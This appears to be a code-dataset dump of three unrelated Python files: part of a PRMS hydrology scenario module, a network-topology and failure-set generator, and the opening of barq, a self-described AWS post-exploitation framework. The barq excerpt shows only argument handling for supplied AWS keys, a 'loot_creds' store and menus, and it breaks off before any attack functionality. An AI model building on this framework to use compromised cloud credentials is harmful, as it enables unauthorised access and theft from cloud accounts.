and 'data' must be present there
scenarios_dir (str): directory where scenario data will be written
to; will be overwritten or created if it does not exist
Keyword Arguments:
title (str, optional): title of the ScenarioSeries instance
description (str, optional): description of the ScenarioSeries
instance
Attributes:
metadata (dict): dictionary with title, description, and UUID map
dictionary for individual ``Scenario`` output directories;
the UUID dictionary (``uuid_title_map``) is left empty until
calling :meth:`ScenarioSeries.build`.
scenarios (list): empty list that will be filled with ``Scenario``s
after defining them by calling :meth:`ScenarioSeries.build`.
Example:
There are three steps to both ``Scenario`` and ScenarioSeries,
first we initialize the object
>>> series = ScenarioSeries(
>>> base_dir = 'dir_with_input_files',
>>> scenarios_dir = 'dir_to_run_series',
>>> title = 'title_for_group_of_scenarios',
>>> description = 'description_for_scenarios'
>>> )
The next step is to "build" the ``ScenarioSeries`` by calling the
:meth:`ScenarioSeries.build` method which defines which parameters
to modify, how to modify them, and then performs the modification
which readies the series to be "run" (the last step). See the
:meth:`ScenarioSeries.build` method for the next step example.
Also see :ref:`scenario_and_scenarioseries_tutorial` for full example
"""
def __init__(self, base_dir, scenarios_dir, title=None, description=None):
"""
"""
self.base_dir = base_dir
self.scenarios_dir = scenarios_dir
if os.path.exists(scenarios_dir):
shutil.rmtree(scenarios_dir)
os.mkdir(scenarios_dir)
shutil.copytree(base_dir, os.path.join(scenarios_dir, 'base_inputs'))
self.metadata = dict(title=title,
description=description,
uuid_title_map={})
self.scenarios = []
self.outputs = None
@classmethod
def from_parameters_iter(cls, base_directory, parameters_iter,
title=None, description=None):
'''
Alternative way to initialize and build a ``ScenarioSeries`` in one
step.
Create and build a ``ScenarioSeries`` by passing the list of
parameter-keyed, function-valued dictionaries (``parameters_iter``)
that is otherwise passed to :meth:`ScenarioSeries.build`.
Arguments:
base_directory (str): directory that contains model input files
parameters_iter (list of dicts): list of dictionaries for each
``Scenario`` as described in :class:`Scenario` and
:meth:`ScenarioSeries.build`.
title (str): title for group of scenarios
description (str): description for group of scenarios
Returns:
None
'''
series = cls(base_directory, base_directory,
title=title, description=description)
for parameters in parameters_iter:
title = parameters['title'] if 'title' in parameters else None
uu = str(uuid.uuid4())
series.metadata['uuid_title_map'].update({uu: title})
scenario_dir = os.path.join(series.scenarios_dir, uu)
scenario = Scenario(series.base_dir, scenario_dir, title=title)
scenario.build()
series.scenarios.append(scenario)
with open(
os.path.join(series.scenarios_dir, 'series_metadata.json'), 'w'
) as f:
f.write(json.dumps(series.metadata, indent=2))
def __len__(self):
return len(self.scenarios)
def build(self, scenarios_list):
"""
Build the scenarios from a list of scenario definitions in dictionary
form.
Each element of ``scenarios_list`` can have any number of parameters
as keys with a function for each value. The other two acceptable keys
are ``title`` and ``description`` which will be passed on to each
individual Scenario's metadata in ``series_metadata.json`` for future
lookups. The ``build`` method also creates a file structure that uses
UUID values as individual ``Scenario`` subdirectory names, as shown below.
Arguments:
scenarios_list (list): list of dictionaries with key-value
pairs being parameter-function definition pairs or
title-title string or description-description string.
Returns:
None
Examples:
Following the initialization of a ``ScenarioSeries`` instance as
shown the example docstring there, we "build" the series by
defining a list of parameter-name-keyed, function-valued
dictionaries. This example uses arbitrary functions on two
PRMS parameters *snowinfil_max* and *snow_adj*,
>>> def _function1(x): #Note, function must start with underscore
return x * 0.5
>>> def _function2(x):
return x + 5
>>> dic1 = {'snowinfil_max': _function1, 'title': 'scenario1'}
>>> dic2 = {'snowinfil_max': _function2,
'snow_adj': _function1,
'title': 'scenario2',
'description': 'we adjusted two snow parameters'
}
>>> example_scenario_list = [dic1, dic2]
>>> # now we can build the series
>>> series.build(example_scenario_list)
In this example that follows from :class:`ScenarioSeries` example the
file structure that is created by the ``build`` method is as follows::
dir_to_run_series
├── 670d6352-2852-400a-997e-7b12ba34f0b0
│ ├── control
│ ├── data
│ └── parameters
├── base_inputs
│ ├── control
│ ├── data
│ └── parameters
├── ee9526a9-8fe6-4e88-b357-7dfd7111208a
│ ├── control
│ ├── data
│ └── parameters
└── series_metadata.json
As shown, the build method has copied the original inputs from the
``base_dir`` given on initialization of ``ScenarioSeries`` to a new
subdirectory of the ``scenarios_dir``. It has also applied the
parameter modifications for both scenarios above and moved the
input files to their respective directories. At this stage the
``metadata`` will not yet have updated the UUID map dictionary with each
scenario's subdirectory because the scenarios have not yet been run. See the
:meth:`ScenarioSeries.run` method for further explanation including
the final file structure and metadata file contents.
"""
title = None
description = None
for s in scenarios_list:
if 'title' in s:
title = s['title']
del s['title']
if 'description' in s:
description = s['description']
del s['description']
uu = str(uuid.uuid4())
self.metadata['uuid_title_map'].update({uu: title})
scenario_path = os.path.join(self.scenarios_dir, uu)
# create Scenario
scenario = Scenario(
self.base_dir, scenario_path, title=title,
description=description
)
# s now only contains parameter keys and function references vals
scenario.build(s)
self.scenarios.append(scenario)
with open(
os.path.join(self.scenarios_dir, 'series_metadata.json'), 'w'
) as f:
f.write(json.dumps(self.metadata, indent=2))
def run(self, prms_exec='prms', nproc=None):
"""
Run a "built" ``ScenarioSeries`` and make final updates
to file structure and metadata.
Keyword Arguments:
prms_exec (str): name of PRMS executable on $PATH or path to
executable. Default = 'prms'
nproc (int or None): number of processors available to
parallelize PRMS simulations; if None (default) then use
half of the CPU count that :mod:`multiprocessing` detects on the
machine.
Returns:
None
Examples:
This example starts where the example ends in
:meth:`ScenarioSeries.build`, calling ``run`` will run the
models for all scenarios and then update the file structure
as well as create individual ``Scenario`` metadata files as such::
dir_to_run_series
├── 5498c21d-d064-45f4-9912-044734fd230e
│ ├── inputs
│ │ ├── control
│ │ ├── data
│ │ └── parameters
│ ├── metadata.json
│ └── outputs
│ ├── prms_ic.out
│ ├── prms.out
│ └── statvar.dat
├── 9d28ec5a-b570-4abb-8000-8dac113cbed3
│ ├── inputs
│ │ ├── control
│ │ ├── data
│ │ └── parameters
│ ├── metadata.json
│ └── outputs
│ ├── prms_ic.out
│ ├── prms.out
│ └── statvar.dat
├── base_inputs
│ ├── control
│ ├── data
│ └── parameters
└── series_metadata.json
As we can see the file structure follows the combined structures
as defined by :class:`Simulation` and :class:`Scenario`. The content
of the top-level metadata file ``series_metadata.json`` is as such::
{
"title": "title_for_group_of_scenarios",
"description": "description_for_scenarios",
"uuid_title_map": {
"5498c21d-d064-45f4-9912-044734fd230e": "scenario1",
"9d28ec5a-b570-4abb-8000-8dac113cbed3": "scenario2"
}
}
Therefore one can use the :mod:`json` file to map between UUIDs and
individual scenario titles. The json files are read as a Python
dictionary which makes them particularly convenient. The contents of
an individual scenario's ``metadata.json`` file include a string
representation of the function(s) that were applied to the
parameter(s)::
{
"description": null,
"end_datetime": "2018-09-03T00:00:40.793817",
"mod_funs_dict": {
"snowinfil_max": "def _function1(x):
return x * 0.5"
},
"start_datetime": "2018-09-03T00:00:30.421353",
"title": "scenario1"
}
Note:
As shown, it is important to give appropriate scenario titles when
building a ``ScenarioSeries`` dictionary in order to later
understand how parameters were modified in each scenario. If not
one would have to rely on the individual ``metadata.json`` files
in each scenario directory which may be more cumbersome.
"""
if not nproc:
nproc = mp.cpu_count()//2
pool = mp.Pool(processes=nproc)
pool.map(_scenario_runner, self.scenarios)
# multiprocessing requires the function to be defined at module scope so it's picklable
def _scenario_runner(scenario, prms_exec='prms'):
scenario.run(prms_exec=prms_exec)
class Scenario:
"""
Container for the process in which one modifies input parameters then
runs a simulation while tracking metadata.
Metadata includes a title and description, if provided, plus start/end
datetime, and parameter names of parameters that were modified including
string representations of the Python modification functions that were
applied to each parameter. The metadata file is in :mod:`json` format
making it conveniently read as a Python dictionary.
Arguments:
base_dir (str): path to directory that contains initial *control*,
*parameter*, and *data* files to be used for ``Scenario``.
The *parameters* file in ``base_dir`` will not be modified;
instead it will be copied to ``scenario_dir`` and then modified.
scenario_dir (str): directory path to bundle inputs and outputs
title (str, optional): title of ``Scenario``, if given will be
added to ``Scenario.metadata`` attribute as well as the
``metadata.json`` file in ``scenario_dir`` written after
calling the :func:`Scenario.build()` and :func:`Scenario.run()`
methods.
description (str, optional): description of ``Scenario``; like
``title``, it is also added to ``Scenario.metadata``.
Attributes:
metadata (:class:`scenario.ScenarioMetadata`): a dictionary-like
class in :mod:`prms_python.scenario` that tracks ``Scenario`` and
``ScenarioSeries`` information including user-defined parameter
modifications and descriptions, and file structure.
Examples:
This example is kept simple for clarity; here we adjust a
single PRMS parameter *tmin_lapse* by using a single arbitrary
mathematical function. We use the example PRMS model included
with PRMS-Python for this example,
>>> input_dir = 'PRMS-Python/test/data/models/lbcd'
>>> scenario_directory = 'scenario_testing'
>>> title = 'Scenario example'
>>> desc = 'adjust tmin_lapse using sine wave function'
>>> # create Scenario instance
>>> scenario_obj = Scenario(
base_dir=input_dir,
scenario_dir=scenario_directory,
title=title,
description=desc
)
Next we need to build a dictionary of parameters to modify, in this
case *tmin_lapse*; here we use a vectorized sine function
>>> # build the modification function and dictionary
>>> def a_func(arr):
return 4 + np.sin(np.linspace(0,2*np.pi,num=len(arr)))
>>> # make dictionary with parameter names as keys and modification
>>> # function as values
>>> param_mod_dic = dict(tmin_lapse=a_func)
>>> scenario_obj.build(param_mod_funs=param_mod_dic)
After building a ``Scenario`` instance the input files are
copied to ``scenario_dir`` which was assigned 'scenario_testing'::
scenario_testing
├── control
├── data
└── parameters
After calling ``build`` the input files from ``input_dir`` were
first copied to ``scenario_dir`` and then the functions in
``param_mod_dic`` were applied to the parameter names (keys)
in ``param_mod_dic``. To run the ``Scenario`` use the ``run``
method
>>> scenario_obj.run()
Now the simulation is run and the ``metadata.json`` file is created,
the final file structure will be similar to this::
scenario_testing
├── inputs
│ ├── control
│ ├── data
│ └── parameters
├── metadata.json
└── outputs
├── prms_ic.out
├── prms.out
└── statvar.dat
Finally, here is what is contained in ``metadata.json`` for this example,
which is also updated in the :attr:`Scenario.metadata` attribute
>>> scenario_obj.metadata
{
'title': 'Scenario example',
'description': 'adjust tmin_lapse using sine wave function',
'start_datetime': '2018-09-01T19:20:21.723003',
'end_datetime': '2018-09-01T19:20:31.117004',
'mod_funs_dict': {
'tmin_lapse': 'def a_func(arr):
return 4 + np.sin(np.linspace(0,2*np.pi,num=len(arr)))'
}
}
As shown, the metadata records the parameter modification function
as a string representation of the exact Python function(s) used for
modifying the user-defined parameter(s).
Note:
The main differentiator between :class:`Scenario` and
:class:`ScenarioSeries` is that ``Scenario`` is designed for modifying
one or more parameters of a **single** *parameters* file whereas
``ScenarioSeries`` is designed for modifying and tracking the
modification of one or more parameters in **multiple** PRMS
*parameters* files, therefore resulting in multiple PRMS simulations.
"""
def __init__(self, base_dir, scenario_dir,
title=None, description=None):
self.title = title
self.description = description
self.base_dir = base_dir
self.scenario_dir = scenario_dir
self.metadata = ScenarioMetadata(title=title, description=description)
self.__simulation_ready = False
def build(self, param_mod_funs=None):
"""
Take a user-defined dictionary with parameter names as keys and Python
functions as values, copy the original input files as given when
initializing a :class:`Scenario` instance to the ``scenario_dir``,
then apply the functions in the user-defined dictionary to the
parameters there. The ``build`` method must be called before running
the ``Scenario`` (calling :func:`Scenario.run()`).
Keyword Arguments:
param_mod_funs (dict): dictionary with parameter names as keys
and Python functions as values to apply to those parameters
Returns:
None
Example:
see :class:`Scenario` for a full example.
Note:
If the ``scenario_dir`` that was assigned for the current
instance already exists, it will be overwritten when ``build``
is invoked.
"""
if isinstance(param_mod_funs, dict):
# create scenario_dir that will be used as Simulation input dir
if os.path.isdir(self.scenario_dir):
shutil.rmtree(self.scenario_dir)
os.makedirs(self.scenario_dir)
shutil.copy(
os.path.join(self.base_dir, 'control'), self.scenario_dir
)
shutil.copy(
os.path.join(self.base_dir, 'data'), self.scenario_dir
)
old_params_path = os.path.join(self.base_dir, 'parameters')
new_params_path = os.path.join(self.scenario_dir, 'parameters')
if not param_mod_funs:
shutil.copy(old_params_path, self.scenario_dir)
else:
modify_params(old_params_path, new_params_path, param_mod_funs)
param_mod_funs_metadata = {
param_name: inspect.getsource(param_mod_fun)
for param_name, param_mod_fun in param_mod_funs.items()
}
self.metadata['mod_funs_dict'] = param_mod_funs_metadata
self.simulation = Simulation(self.scenario_dir, self.scenario_dir)
else:
self.simulation = Simulation(self.scenario_dir)
self.__simulation_ready = True
def run(self, prms_exec='prms'):
"""
Run the PRMS simulation for a *built* ``Scenario`` instance.
Keyword Arguments:
prms_exec (str): name of PRMS executable on $PATH or path to
executable
Returns:
None
Examples:
see :class:`Scenario` for full example
Raises:
RuntimeError: if the :func:`Scenario.build` method has not yet
been called.
"""
if not self.__simulation_ready:
raise RuntimeError(
'Scenario has not yet been prepared: call the build method first'
)
self.metadata['start_datetime'] = datetime.now().isoformat()
self.simulation.run(prms_exec=prms_exec)
self.metadata['end_datetime'] = datetime.now().isoformat()
self.metadata.write(os.path.join(self.scenario_dir, 'metadata.json'))
class ScenarioMetadata:
def __init__(self, title=None, description=None, start_datetime=None,
end_datetime=None, mod_funs_dict=None):
self.metadata_dict = dict(title=title,
description=description,
start_datetime=start_datetime,
end_datetime=end_datetime,
mod_funs_dict=mod_funs_dict)
def __getitem__(self, key):
return self.metadata_dict[key]
def __setitem__(self, key, value):
self.metadata_dict[key] = value
def __repr__(self):
return self.metadata_dict.__repr__()
def write(self, output_path):
with open(output_path, 'w') as f:
f.write(json.dumps(self.metadata_dict, ensure_ascii=False,\
indent=4, sort_keys=True))
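# A minimal usage sketch (added note, not part of the original module): the
# metadata written by ScenarioMetadata.write / ScenarioSeries.run can be read
# back with the standard json module to map the UUID-named scenario
# directories to their human-readable titles.  Paths below assume the example
# layout from the docstrings above.
#
#     import json, os
#     series_dir = 'dir_to_run_series'
#     with open(os.path.join(series_dir, 'series_metadata.json')) as f:
#         meta = json.load(f)
#     for uu, title in meta['uuid_title_map'].items():
#         statvar = os.path.join(series_dir, uu, 'outputs', 'statvar.dat')
#         print(title, statvar)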
``` |
{
"source": "johnvon/column-generation-framework",
"score": 3
} |
#### File: examples/survivable-net/netgen.py
```python
import random
import os
import re
import math
import sys
#
# Convert a set to set of string
#
def set2char( F ) :
F1 = []
for fs in F :
fs1 = []
for s in fs :
fs1.append( set( [ str( x ) for x in s ] ) )
F1.append( fs1 )
return F1
#
# Add " to string
#
def primecover( s ) :
return "\"" + s + "\""
#
# compute number of color after removing S
#
def checkNumberColor( topo , S ) :
temptopo = [ x for x in topo if x not in S ]
# first set color of all nodes = 0
color = {}
for x in topo :
for v in x :
color[ v ] = 0
# paint node v with color c
def travel( v , c ) :
color[ v ] = c
for x in temptopo :
if v in x :
for u in x :
if color[ u ] == 0 :
travel( u , c )
# compute number of color
ncolor = 0
for x in topo :
for v in x :
if color[v] == 0 :
ncolor = ncolor + 1
travel( v , ncolor )
return ncolor
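# Illustrative note (added, not in the original script): checkNumberColor
# returns the number of connected components left after removing the edge set
# S from the undirected topology `topo`, so a candidate failure set keeps the
# network connected only when the result is 1.  Hypothetical example for a
# triangle a-b-c:
#
#     triangle = [frozenset(('a', 'b')), frozenset(('b', 'c')), frozenset(('a', 'c'))]
#     checkNumberColor(triangle, set([frozenset(('a', 'b'))]))
#     # -> 1, graph still connected
#     checkNumberColor(triangle, set([frozenset(('a', 'b')), frozenset(('a', 'c'))]))
#     # -> 2, node 'a' is isolated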
lstNode = []
lstEdge = []
logicdeg = {}
logictopo = []
capacity = {}
shortest = {}
mody = {}
F1 = set()
F2 = set()
F3 = set()
F4 = set()
FNODE = set()
def generate_logic( degree , genedge , ishalf ) :
global logicdeg , logictopo , lstNode , lstEdge , shortest
logicdeg = {}
logictopo = []
for v in lstNode :
logicdeg[ v ] = 0
random.seed()
# GENERATE BY DEGREE
if degree > 0 :
while ( 1 ) :
underdeg = [ v for v in lstNode if logicdeg[v] < degree ]
if not len( underdeg ):
break
# take two random variables from underdeg
v1 = random.choice( underdeg )
v2 = random.choice( underdeg )
if len( underdeg ) > 1 :
while v1 == v2 :
v2 = random.choice( underdeg )
else :
while v1 == v2 :
v2 = random.choice( lstNode )
# update degree
logicdeg[ v1 ] += 1
logicdeg[ v2 ] += 1
logictopo.append( [ v1 , v2 ] )
logictopo.append( [ v2 , v1 ] )
else :
# GENERATE BY EDGE
tmpNode = set()
while (2 * len( tmpNode )) < len( lstNode ) :
v = random.choice( lstNode )
tmpNode.add( v )
#print "- half node : " , tmpNode
ge = 0
while ge < genedge :
if not ishalf :
v1 = random.choice( lstNode )
v2 = random.choice( lstNode )
else :
v1 = random.choice( list(tmpNode) )
v2 = random.choice( list(tmpNode) )
if (v1 != v2) :
logictopo.append( [ v1 , v2 ] )
logictopo.append( [ v2 , v1 ] )
ge += 1
# update degree
logicdeg[ v1 ] += 1
logicdeg[ v2 ] += 1
# verify logic topology
needrerun = 0
for v in lstNode :
if logicdeg[ v ] == 2 :
print "node " , v , " has degree " , logicdeg[ v ]
needrerun = 1
if needrerun:
generate_logic( degree , genedge , ishalf )
#
# Reading topo information
#
def reading_data( basename ) :
global logicdeg , logictopo , lstNode , lstEdge , F1 , F2 , F3 , F4 , FNODE
lstNode = []
lstEdge = []
print "READ TOPO : " , basename
ffile = open( "./topo/" + basename + ".topo" )
tag = 0
edgename = 0
separator = "[\ |\n|\t|\r]+"
for line in ffile :
if ( re.match("TAG" , line ) ) :
item = re.split( separator , line )
tag = int(item[1])
# node
if ( re.match( "node" , line ) ) :
item = re.split( separator , line )
lstNode.append( item[1] )
# link
if ( re.match( "link" , line ) ) :
item = re.split( separator , line )
edgename += 1
if tag == 1 :
lstEdge.append( ( str(edgename) , item[3] , item[5] , item[7] ) )
if tag == 2 :
lstEdge.append( ( str(edgename) + 'a' , item[2] , item[3] , item[4] ) )
lstEdge.append( ( str(edgename) + 'b' , item[3] , item[2] , item[4] ) )
# get set of all undirect edge
F1 = set( )
F2 = set( )
F3 = set( )
F4 = set( )
FNODE = set ( )
# get set of all undirect edge
lstUedge = set( )
for edge in lstEdge :
lstUedge.add( frozenset( ( edge[1] , edge[2] )) )
# build single failure set
for e in lstUedge :
if checkNumberColor( lstUedge , set( [e] ) ) == 1 :
F1.add( frozenset([e]) )
# build single node failure set
for v in lstNode :
tempnodeset = set()
for e in lstUedge :
if v in e :
tempnodeset.add( e )
#print "number color = " , checkNumberColor( lstUedge , tempnodeset)
FNODE.add( frozenset( tempnodeset ) )
# build higher order failure set
for v in lstNode :
temp = set()
for e in lstUedge:
if v in e :
temp.add( e )
# build dual
for e1 in temp :
for e2 in temp :
if len( set( [e1,e2] ) ) == 2 :
if checkNumberColor( lstUedge , set( [e1,e2] ) ) == 1 :
F2.add( frozenset( [ e1 , e2 ] ) )
# build third
for e1 in temp :
for e2 in temp :
for e3 in temp :
if len( frozenset([e1,e2,e3]) )== 3 :
if checkNumberColor( lstUedge , frozenset( [e1,e2,e3] ) ) == 1 :
F3.add( frozenset( [ e1 , e2 , e3 ] ) )
# build fourth
for e1 in temp :
for e2 in temp :
for e3 in temp :
for e4 in temp :
if len( frozenset([ e1 , e2, e3 ,e4]) )== 4 :
if checkNumberColor( lstUedge , frozenset( [e1,e2,e3,e4] ) ) == 1 :
F4.add( frozenset( [ e1 , e2 , e3 , e4 ] ) )
print "number of edges : " , len( lstEdge )
print "number of nodes : " , len( lstNode )
print "number of single failure : " , len( F1 )
print "number of dual failure : " , len( F2 )
print "number of third failure : " , len( F3 )
print "number of fourth failure : " , len( F4 )
F1 = [ x for x in F1 ]
F2 = [ x for x in F2 ]
F3 = [ x for x in F3 ]
F4 = [ x for x in F4 ]
random.shuffle( F1 )
random.shuffle( F2 )
random.shuffle( F3 )
random.shuffle( F4 )
print "------------------------------------"
ffile.close()
#
# Writing basic information : node set + edge set + failure set
#
def write_basic( fnet , nloc , sce ) :
global logicdeg , logictopo , lstNode , lstEdge , shortest , mody , F1,F2,F3,F4 , FNODE
# write node set
fnet.write("nodeset = {\n" )
for nnode in lstNode :
fnet.write( primecover( nnode ) + ",\n" )
fnet.write("};\n")
# compute capacity
for e in lstEdge :
capacity[ e ] = 0
for x,y in logictopo[ 0 : nloc ] :
for e in shortest[ (x,y) ] :
capacity[ e ] += 1
# write edgeset
for e in lstEdge :
if mody[e] > 0 :
dv = 0.2 * capacity[e]
else :
dv = -0.2 * capacity[e]
newe = math.ceil( capacity[ e ] + dv )
if ( newe < 1 ) :
newe = 1
#print e , ":" , capacity[e ] , "=>" , newe
capacity[ e ] = newe
fnet.write("edgeset = {\n" )
for nedge in lstEdge :
fnet.write("< ")
for item in nedge[:-1] :
fnet.write( primecover( item ) + "," )
fnet.write( nedge[ -1 ] )
fnet.write( "," + str(capacity[ nedge ]) )
fnet.write(" >,\n")
fnet.write("};\n")
print "finish writing basic information"
# print all link failure
FSET = set();
if sce == 1 :
FSET = F1
if sce == 2 :
FSET = F1 + F2[ 0 : len(F2)/14 +1 ]
if sce == 3 :
FSET = F1 + F2[ 0 : len(F2)/14 +1 ] + F3[ 0 : len(F3)/14 + 1 ]
if sce == 4 :
FSET = F1 + F2[ 0 : len(F2)/10 +1 ] + F3[ 0 : len(F3)/10 + 1 ]
if sce == 5 :
FSET = F1 + F2[ 0 : len(F2)/10 +1 ] + F3[ 0 : len(F3)/10 + 1 ] + F4[ 0 : len(F4)/20 + 1 ]
if sce == 6 :
FSET = FNODE
FSET = set2char( FSET )
fnet.write("nfailure = " + str( len( FSET) ) + ";\n" )
fnet.write( "failureset = [ \n" )
for fs in FSET :
fnet.write( "{ " )
for edge in lstEdge :
for uedge in fs :
#print "check " , edge[1], edge[2] , " in " , uedge
if (( edge[1] in uedge ) and ( edge[2] in uedge ) ):
fnet.write( primecover( edge[0] ) + " ")
fnet.write( " },\n" )
fnet.write( "]; \n" )
print "finish writing failure"
#
# Writing logicset from 0 to nloc
#
def write_logic( fnet , nloc ) :
global logictopo
fnet.write("logicset = { \n" )
id = 0
for v1,v2 in logictopo[ 0 : nloc ] :
fnet.write("< " + str(id) + " , " + primecover( v1 ) + " , " + primecover( v2 ) + " , 1 >\n" )
id += 1
fnet.write("};\n" )
#
# Writing common information
#
def write_common( fnet ) :
# write common data
fcommon = open( "common.dat" )
cmlist = fcommon.readlines()
for li in cmlist:
fnet.write( li )
fcommon.close()
#
# Compute shortest path for artificial capacity constraints
#
def compute_shortest( ) :
global logicdeg , logictopo , lstNode , lstEdge , capacity , shortest , mody
shortest = {}
mody = {}
for e in lstEdge :
mody[ e ] = 0
while mody[e] == 0 :
mody[ e ] = random.randint( - 1 , 1 )
# generate capacity
for x , y in logictopo :
#print "shortest path : " , x , " => " , y
shortest[ (x,y) ] = []
dis = {}
pre = {}
notvisit = set()
for v in lstNode:
dis[ v ] = 100000
notvisit.add( v )
dis[ x ] = 0
pre[ x ] = x
consider = x
while consider != y :
notvisit.remove( consider )
for e in lstEdge :
if ( e[1] == consider ) :
if ( dis[ consider ] + 1 ) < dis[ e[2] ] :
dis[ e[2] ] = dis[ consider ] + 1
pre[ e[2] ] = e[1 ]
consider = y
for v in notvisit :
if dis[v ] < dis[ consider ] :
consider = v
consider = y
thelen = 0
while consider != x :
for e in lstEdge :
if ( e[1] == pre[consider] and e[2] == consider ) :
shortest[ ( x , y ) ].append( e )
thelen = thelen + 1
consider = pre[ consider ]
#
# generate topo
#
def generate_topo( basename , lstDegree , lstNoLogic , iter , ishalf , listSCE ):
global logicdeg , logictopo , lstNode , lstEdge
# read generate topo data
reading_data( basename )
# generate by degree
for degree in lstDegree :
generate_logic( degree , 0 , ishalf )
compute_shortest()
for sce in listSCE :
fnet = open( "./net/" + basename + "-s" + str(sce) + "-d" + str(degree) + "-" + str(iter) + ".net" , "w" )
write_basic( fnet , 1000000 , sce )
write_logic( fnet , 1000000 )
write_common( fnet )
fnet.close()
generate_logic( 0 , len( lstNode ) * len( lstNode ) , ishalf )
compute_shortest()
for nloc in lstNoLogic :
for sce in listSCE :
if not ishalf :
fnet = open( "./net/" + basename + "-s" + str(sce) + "-e" + str(nloc) + "-" + str(iter) + ".net" , "w" )
else :
fnet = open( "./net/" + basename + "-hs" + str(sce) + "-e" + str(nloc) + "-" + str(iter) + ".net" , "w" )
write_basic( fnet , 2 * nloc , sce )
write_logic( fnet , 2 * nloc )
write_common( fnet )
fnet.close()
if __name__ == "__main__" :
#print "delete old files "
#for ff in os.listdir("net" ) :
# file_path = os.path.join("net", ff )
# os.unlink( file_path )
print ""
print "GENERATE NETWORKS"
print ""
for filename in os.listdir( "topo" ):
basename,extension = filename.split(".")
if extension != "topo" :
continue
print ""
print "TOPO :" , basename , "\n"
for i in range( 100 ) :
if basename == "NSF" :
generate_topo( basename , [] , [ 10 , 18 ] , i , False , [1] )
if basename == "EURO" :
generate_topo( basename , [] , [ 25 ] , i , False , [1] )
if basename == "NJLATA" :
generate_topo( basename , [ ] , [ 14 , 16 ] , i , False , [1] )
#if basename == "test" :
# generate_topo( basename , [ 3 ] , [ 20 ] , i , False , [1,2,3,4,5,6] )
if basename == "24NET" :
generate_topo( basename , [ ] , [ 35 ] , i , False , [1] )
generate_topo( basename , [ ] , [ 20,30,40,50,60 ] , i , False , [5] )
``` |
{
"source": "JohnVonNeumann/barq",
"score": 2
} |
#### File: JohnVonNeumann/barq/barq.py
```python
import boto3, json
from clint.arguments import Args
from clint.textui import puts, colored, indent, prompt, validators
import time
from prettytable import PrettyTable
import string
import os
import random
import subprocess
import readline
import sys
import signal
import re
from threading import Event, Thread
import logging
from getpass import getpass
from pygments import highlight
from pygments.lexers.data import JsonLexer
from pygments.formatters.terminal import TerminalFormatter
#signing commit again
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
raw_input = input
else:
string_types = basestring,
def id_generator(size=10, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
def set_session_region(region):
global my_aws_creds
mysession = None
try:
if my_aws_creds['aws_session_token'] == '':
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
return mysession
except:
return None
def color(string, color=None):
"""
Change text color for the Linux terminal. (Taken from Empire: https://github.com/EmpireProject/Empire/blob/master/lib/common/helpers.py)
"""
attr = []
# bold
attr.append('1')
if color:
if color.lower() == "red":
attr.append('31')
elif color.lower() == "green":
attr.append('32')
elif color.lower() == "yellow":
attr.append('33')
elif color.lower() == "blue":
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
if string.strip().startswith("[!]"):
attr.append('31')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[+]"):
attr.append('32')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[..]"):
attr.append('33')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
elif string.strip().startswith("[*]"):
attr.append('34')
return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
else:
return string
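# Usage illustration (added note): color() keys off the standard barq message
# prefixes when no explicit colour is given, e.g.
#
#     puts(color('[+] done'))            # rendered green
#     puts(color('[!] something broke')) # rendered red
#     puts(color('[..] working...'))     # rendered yellow
#     puts(color('heading', 'blue'))     # explicit colour override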
def start():
"""
The start of the barq functionality.
:return: None
"""
signal.signal(signal.SIGINT, signal.default_int_handler)
args = Args()
puts(color(asciilogo,'yellow'))
puts(color("barq: The AWS post exploitation framework written by <NAME>","green"))
global loot_creds
global ec2instances
global menu_stack
global my_aws_creds
global secgroups
global command_invocations
global lambdafunctions
menu_stack = []
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
ec2instances = {'instances':[]}
lambdafunctions = {'functions':[]}
secgroups = {'groups':[]}
my_aws_creds = {}
command_invocations = {'commands':[]}
global logger
logger = logging.getLogger('log')
logger.setLevel(logging.ERROR)
logpath = 'log.log'
ch = logging.FileHandler(logpath)
ch.setFormatter(logging.Formatter('%(asctime)s: %(message)s'))
logger.addHandler(ch)
logger.error('calling start')
myargs = dict(args.grouped)
if '--help' in myargs or '-h' in myargs:
help = """
barq framework options:
-h --help - This menu
-k --keyid - The AWS access key id
-s --secretkey - The AWS secret access key. (Needs --keyid, mandatory)
-r --region - The default region to use. (Needs --keyid)
-t --token - The AWS session token to use. (Needs --keyid, optional)
"""
print (help)
exit(0)
if '--keyid' in myargs or '-k' in myargs:
try:
aws_access_key_id = myargs['--keyid'][0]
except:
aws_access_key_id = myargs['-k'][0]
if '--secretkey' not in myargs and '-s' not in myargs:
puts(color("[!] using --secretkey is mandatory with --keyid"))
exit()
try:
aws_secret_access_key = myargs['--secretkey'][0]
except:
aws_secret_access_key = myargs['-s'][0]
if '--region' not in myargs and '-r' not in myargs:
puts(color("[!] using --region is mandatory with --keyid"))
exit()
try:
region_name = myargs['--region'][0]
except:
region_name = myargs['-r'][0]
if '--token' in myargs or '-t' in myargs:
try:
aws_session_token = myargs['--token'][0]
except:
aws_session_token = myargs['-t'][0]
else:
aws_session_token = ''
set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token)
menu_forward('main')
def menu_forward(menu):
"""
Go forward to a new menu (Push to menu stack)
:param menu: The menu to go to
:return: None
"""
global menu_stack
global logger
if menu == 'training':
menu_stack.append(menu)
training_loop()
elif menu == 'ec2instances':
menu_stack.append(menu)
instances_loop()
else:
logger.error('calling menu forward for main')
menu_stack.append('main')
main_loop()
def menu_backward():
"""
Go back to previous menu (Pull from menu stack)
:return: None
"""
global menu_stack
try:
current_menu = menu_stack.pop()
next_menu = menu_stack[-1]
if next_menu == 'main':
go_to_menu(next_menu)
elif next_menu == 'training':
go_to_menu(next_menu)
elif next_menu == 'ec2instances':
go_to_menu(next_menu)
except Exception as e:
print(e)
pass
def go_to_menu(menu):
